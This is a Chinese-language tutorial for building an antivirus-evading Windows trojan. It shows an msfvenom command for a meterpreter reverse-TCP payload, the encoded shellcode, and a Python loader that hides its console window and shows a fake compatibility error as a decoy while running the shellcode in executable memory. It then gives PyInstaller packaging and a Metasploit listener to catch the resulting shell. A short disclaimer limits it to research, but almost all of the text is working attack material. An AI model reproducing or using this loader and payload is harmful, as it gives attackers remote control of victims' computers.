仅供技术研究学习参考,请准守网络安全法
先生成好木马的字节文件
msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.124.6 -e x86/shikata_ga_nai -i 11 -f py -o bk.py
木马字节文件内容如下:
bk.py:
buf = b""
buf += b"\xdb\xc7\xd9\x74\x24\xf4\x58\xba\x6f\x27\xba\x77\x2b"
buf += b"\xc9\xb1\x99\x83\xe8\xfc\x31\x50\x16\x03\x50\x16\xe2"
buf += b"\x9a\x98\x66\x6a\x50\xbe\x4d\x4a\x41\x34\x56\x81\x29"
buf += b"\x9c\x5f\xd8\x5a\xef\x27\x09\xdf\xf8\x24\x2e\x7b\xeb"
buf += b"\x02\x9d\x6d\x70\x18\x50\xa1\x2e\x2e\xa4\xd9\x42\xbc"
buf += b"\x82\x8a\x11\x88\x2e\x3c\xf1\xdc\x56\x7c\x3e\xf6\xc6"
buf += b"\x4f\x44\x11\xcc\xfb\x3b\x95\x6a\xac\x78\x22\x3d\x40"
buf += b"\x09\x91\x3c\x7c\xfc\x41\xf9\x92\x6d\x1e\x27\x5a\x9e"
buf += b"\x0d\xff\xaa\x4e\x18\xf0\xa4\x48\x0b\xa3\x9a\x57\x91"
buf += b"\xc5\x76\x60\x59\xb3\x17\xad\xb3\x7f\x69\x06\x55\x35"
buf += b"\xd5\x8d\x90\xf7\xde\x60\xd1\x20\xc1\x2c\x1c\x70\xa7"
buf += b"\xc9\x57\x8c\x36\xa0\x7c\x22\xa1\x65\x20\x78\x87\x81"
buf += b"\x28\x31\x49\x7c\x42\xd3\x2d\x50\x12\x52\xd1\x04\xd6"
buf += b"\xf1\xf6\x26\x3d\xdd\xf2\xac\x25\x50\xa5\xee\xba\x90"
buf += b"\x6d\xc5\x81\xb5\xd2\xef\xa0\x90\x37\x8c\xda\xf8\xb2"
buf += b"\x16\x7b\x39\x8f\xf6\xa5\x37\xc3\xe9\x60\x90\x54\x36"
buf += b"\x01\x8d\x70\x50\x68\x16\xb8\x55\x4e\xe0\x6c\x51\x2d"
buf += b"\x8d\x5f\x8b\x3f\x63\x3c\x30\x6e\x63\xee\x3b\x32\x98"
buf += b"\x57\xd9\x3e\xb2\xbd\x2b\x48\x44\xb1\x75\x1c\xe3\x4f"
buf += b"\x36\xb1\x0e\x1e\x88\x6e\x34\xca\xb3\x81\x26\x50\xdb"
buf += b"\x1b\xcd\xa5\x5a\x19\x0f\x4e\x0f\xb5\x70\xac\x6c\xe0"
buf += b"\x21\xa2\x55\xdc\x3c\x36\x4b\xfc\xf7\x82\x4f\x65\x5a"
buf += b"\x0c\xf8\x4f\xb1\x6d\x26\x1d\x5d\x33\xe2\x1e\x29\x4f"
buf += b"\x5e\xf2\x83\xcc\x64\x3f\xa7\x4e\xa7\xee\xf7\x89\x0f"
buf += b"\x73\x52\x5d\x7c\xce\x6b\x2f\x05\x34\x38\x1f\xd6\x76"
buf += b"\xf7\xa6\x34\xc6\x93\x67\xb7\x9a\x51\xb6\x2b\xed\x39"
buf += b"\x96\x0f\x6f\xd9\x38\xe5\x54\x6d\x09\x79\x1e\x39\x22"
buf += b"\xde\x5d\xbf\x25\xb5\xb2\xf3\xa8\x79\x00\x8a\xad\x20"
buf += b"\x08\xf4\xb3\x05\xda\x95\x2d\xa3\x6f\x67\xd1\x49\x65"
buf += b"\x24\x9b\x9c\xbe\xc6\x46\xe3\x2b\xbb\xbf\x9e\xe4\x9d"
buf += b"\xf9\x16\xb5\x38\xfa\xd3\xb5\x2f\xe2\xa2\x24\xfb\x4a"
buf += b"\xae\x8d\xdc\xae\x07\x5c\xe4\x50\x3f\xe1\xf5\x00\xf4"
buf += b"\x02\x7e\x34\xb4\xc8\x56\xa1\x03\x39\x99\xc6\x3f\x93"
buf += b"\x39\x13\x2a\x2d\x77\xd1\x7a\x5e\xaa\xc8\x69\x2a\x0c"
buf += b"\x80\x80\x28\xca\x6d\x69\xc2\x65\x32\xb1\x40\x73\xd0"
buf += b"\x33\x67\xec\xa8\xe1\xce\xab\xc6\x2b\xe0\x68\xec\x38"
buf += b"\xc0\x79\x76\x6b\xc0\x65\x48\xe9\x49\x47\xa0\xf9\xc9"
buf += b"\x3a\x90\x8f\x3a\x6d\x33\x3e\x54\x11\xb8\xbf\x04\xa1"
buf += b"\x40\x88\x36\x61\x16\x02\x46\xb4\xf2\xf6\xf7\x50\x63"
buf += b"\x17\xbf\xbe\xb2\xb8\xf0\xc5\xf5\xac\x7e\x59\x20\x86"
buf += b"\x83\xe4\x70\x6f\xd4\xda\x84\xf8\x1c\xa4\xb2\xd5\x2e"
buf += b"\x50\xd8\xf4\xc4\x19\xc2\x91\x60\xc5\x99\x69\x74\x7d"
buf += b"\x01\x2a\x8b\xc3\xbc\xbb\xa2\x64\xef\x9a\xab\xd3\x16"
buf += b"\x29\x7d\x77\x00\xc9\xec\x97\xbf\x04\x40\xa1\x8b\x34"
buf += b"\x52\x26\x9a\x71\x2a\xdc\xf0\x3f\xc5\x1f\xa1\x26\x6e"
buf += b"\x96\xd8\xc8\x12\x04\xbd\xdd\x15\x51\x05\x06\xf3\xbe"
buf += b"\xc2\x63\x7e\xd0\xbd\xdd\x9e\x06\xfc\x3b\xa6\xe4\xee"
buf += b"\x54\x09\x70\x0a\x78\x87\x10\x32\xf5\x72\xee\x5b\xe0"
buf += b"\x60\xe9\xc3\x2c\x24\x4e\x71\x36\x3e\xda\x74\x24\xb4"
buf += b"\xfe"编辑python免杀脚本,将自己生成的木马字节buf替换上去
exploit.py:
from ctypes import *
import tkinter.messagebox
import ctypes
buf = ""
buf += "\xb8\x4b\xef\x56\x6d\xd9\xeb\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x99\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2"
buf += "\xbe\x35\x9c\xd3\x6f\x45\xaa\xdb\xb6\x2d\x89\xd7\x13"
buf += "\xe5\x18\xa6\x30\xc8\xe9\xde\x35\x58\x19\x62\xd5\x15"
buf += "\x4c\x66\x6d\x96\x16\x06\xec\xfe\x85\x65\x43\x44\x0f"
buf += "\x62\xfd\xb3\x23\x4d\x48\x1e\x84\x6d\x25\x78\xef\xe7"
buf += "\xf6\x75\x62\xe8\x6f\x84\x16\xca\xf8\x6a\xe5\xd3\x73"
buf += "\x5b\x1c\x1b\xf9\xad\x27\xd1\x9c\x94\x64\x4d\x2b\x26"
buf += "\xdc\x80\x14\xf4\xc9\xee\xc7\xea\x96\xf4\x21\xb4\xac"
buf += "\x48\x0b\x83\x9a\x4d\x55\xd4\x23\xc1\xd9\x3a\x2c\x8b"
buf += "\xc6\xc2\xb5\x3d\x39\x21\xe1\x30\xaf\x23\x3a\x13\x58"
buf += "\x28\xec\x03\xeb\xb7\x10\xd0\x08\x5f\xc2\x18\x63\x5d"
buf += "\x9b\x63\xba\x64\x42\x3f\x47\xc2\x3e\x7b\xf0\x62\x86"
buf += "\xbc\xa3\x5a\x1a\x98\x73\x87\x87\xa7\x78\x39\x7a\x03"
buf += "\x49\xf4\x4c\x55\x95\x5f\x3f\xbb\x83\x25\x4c\xb4\x5f"
buf += "\x6a\x6a\x45\x42\xdf\xa4\xac\xc8\xf8\x58\x35\xf2\x04"
buf += "\x41\x42\xa7\x61\xb1\xdc\x19\x27\x8f\x28\xcc\xc4\xab"
buf += "\x88\x66\x2d\xdf\xb8\x7f\x5e\x29\xbe\x37\x0d\x4f\xc0"
buf += "\x28\x7f\x94\xf1\x79\x8d\xa7\xd4\xde\x63\xc6\x02\x4a"
buf += "\xd7\x79\xc3\xd2\x91\x7c\xbf\x0f\x0c\xcd\x7c\x79\x6d"
buf += "\x49\xfc\x64\xdf\x7c\x86\xb2\x00\x0b\x00\xfc\x93\x50"
buf += "\xd5\x16\xdd\x8f\xa2\x17\x67\x73\x45\x6f\x5d\xe1\x14"
buf += "\x1b\x94\xe9\xa7\xc8\x3e\xab\x05\x29\x33\xf3\xf5\x82"
buf += "\xf0\x41\x7d\x4a\x63\x13\x39\xc4\xf2\x65\x9a\xf7\x03"
buf += "\x55\x06\xe7\x3a\xeb\x8f\x3e\x1b\x4a\x50\x44\xdb\xf3"
buf += "\xb9\x01\x2d\xdf\x3f\xf3\x20\xd3\xeb\x5c\xfb\x81\x97"
buf += "\x82\xd4\x33\x05\x61\x8c\x93\xb0\x02\x72\x7a\x4c\x8d"
buf += "\xd2\xcc\x35\xe4\x57\xea\x38\x26\xbc\xbe\x09\xda\x9c"
buf += "\x0f\x08\x53\x60\xab\x08\x47\x9c\xc2\x91\xb7\x15\x01"
buf += "\x4c\xbf\xd7\x4f\x18\x4d\xb0\xea\x86\x0a\x4d\x2b\x6b"
buf += "\x56\xed\x98\xce\xae\x8d\xef\x63\x0a\xb1\xcf\x72\x66"
buf += "\x48\x26\xfd\xaf\xdc\xd2\x90\x71\xcb\xb5\x1e\xaf\xd6"
buf += "\xfe\x15\xfd\xe4\xc7\x5a\x99\x64\xee\xba\x47\x55\x55"
buf += "\xad\x23\x92\x7a\x08\x97\x24\xc2\xa2\x0a\x29\x34\x34"
buf += "\xc6\x2e\xd8\xa6\x80\x4a\xec\x44\x91\x6a\xd8\x0e\x09"
buf += "\xd6\x64\x77\xc8\x1c\xf8\x06\x0c\x61\x78\x5e\xdc\x6c"
buf += "\x74\x0d\xbb\xec\x01\xfc\x43\x8c\x88\x2e\xfd\x46\xff"
buf += "\x33\x9d\xfb\x52\x2e\xbb\x1c\x28\xf3\x8f\x10\x84\x25"
buf += "\xae\xd0\x0a\x05\x60\xdb\xc5\xcd\xe0\x21\xb2\x58\x07"
buf += "\x61\x52\x8b\xc9\x30\xc8\xa1\x84\xc1\x49\xd6\x37\x4b"
buf += "\x7c\x4f\xa6\x21\x7b\x36\x54\xba\xf0\x8c\x9a\xba\x7b"
buf += "\x19\x29\xe3\x1f\xdc\xdf\x5c\x2c\x76\x5e\xa3\x31\x00"
buf += "\x5a\x0c\x76\x8f\x56\x34\x2a\x70\x42\xf3\x23\x2d\x08"
buf += "\xdb\xd2\x42\x76\x95\x94\x58\x69\x5a\xc3\x1f\xfd\x76"
buf += "\xbb\xdc\x93\x35\x7a\x42\x71\x1f\xd2\xdb\xb4\x53\x9a"
buf += "\x09\x52\xd2\x88\x53\xdb\x0d\x52\xff\xd1\x5a\xca\x87"
buf += "\x4b\xfd\xa8\xc8\x4a\x3c\x86\xc4\x37\x85\x4c\xdc\x9f"
buf += "\xa8\xe0\x38\x8a\x32\x9f\x51\x85\x58\x0c\x30\x1d\xc7"
buf += "\xa7\xaf\xd1\x6f\x5b\xec\xab\xc2\x5c\xfc\x4c\xb4\xc8"
buf += "\x77"
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
buf = c_char_p(buffer)
size = len(buffer)
addr = libc.valloc(size)
addr = c_void_p(addr)
if 0 == addr:
raise Exception("Failed to allocate memory")
memmove(addr, buf, size)
if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
raise Exception("Failed to set protection on buffer")
return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
if 666==666:
ctypes.windll.user32.ShowWindow(whnd, 0)
ctypes.windll.kernel32.CloseHandle(whnd)
print ".................................."*666
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
buf,
ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
tkinter.messagebox.showerror(title='警告',message='该程序与计算机版本不兼容,请联系发布者')
print "Code By Luan"
shell()现在来到windows,将免杀的木马打包成exe
我们这里使用pyinstaller进行打包
如果没有安装pyinstaller,安装方法如下:
pip install pyinstaller
使用pyinstaller进行打包:
pyinstaller -F exploit.py
metasploit监听:
在windows上运行木马之后即可获取shell